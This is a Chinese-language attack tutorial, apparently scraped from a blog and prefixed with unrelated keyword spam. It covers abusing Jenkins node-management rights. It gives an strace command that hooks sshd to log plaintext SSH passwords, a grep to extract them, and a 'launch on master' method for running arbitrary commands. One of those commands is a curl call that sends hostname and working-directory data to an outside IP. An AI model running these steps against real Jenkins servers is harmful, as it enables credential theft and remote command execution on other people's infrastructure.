做影视网站有什么风险,北京好的前端培训机构,如何创建自己网站,flash个人网站首页模板拥有Jenkins agent权限的账号可以对node节点进行操作#xff0c;通过添加不同的node可以让流水线项目在不同的节点上运行#xff0c;安装Jenkins的主机默认作为master节点。 1.Jenkins 添加node获取明文凭据
通过添加node节点#xff0c;本地监听ssh认证#xff0c;选则凭…拥有Jenkins agent权限的账号可以对node节点进行操作通过添加不同的node可以让流水线项目在不同的节点上运行安装Jenkins的主机默认作为master节点。 1.Jenkins 添加node获取明文凭据
通过添加node节点本地监听ssh认证选则凭据明文进行ssh认证拿到密码。
1.新建节点-manage nodes功能 2.填写工作目录选择通过SSH进行远程节点身份认证选择抓取带*号的凭据host key选择不进行验证 3.主机监听这里监听主机ssh使用的是strace后门实际也可以使用其他方式进行
(strace -f -F -p ps aux|grep sshd -D|grep -v grep|awk {print $2} -t -e traceread,write -s 32 2 /tmp/.sshd.log )
4.保存节点配置 Jenkins将对主机进行ssh请求 node节点认证日志账号密码方式 5. 查看接受结果这种方式获得的密码需要自行判断下起始位置
grep -E read\(6, .\\0\\0\\0\\. /tmp/.sshd.log 2.通过添加节点执行命令
同样的在添加节点时可以配置在master上执行命令去进行其他节点认证也就可以在master上执行恶意命令了。
注意这里执行curl命令时不能使用直接执行系统命令所以利用时需要更换其他方式。
curl -k ip:9090/hostname/pwd
env
添加节点时也可以从控制器执行命令Launch method 选择 通过在master上执行命令的方式 保存然后launch agent 可以在Log里面看到命令env的输出
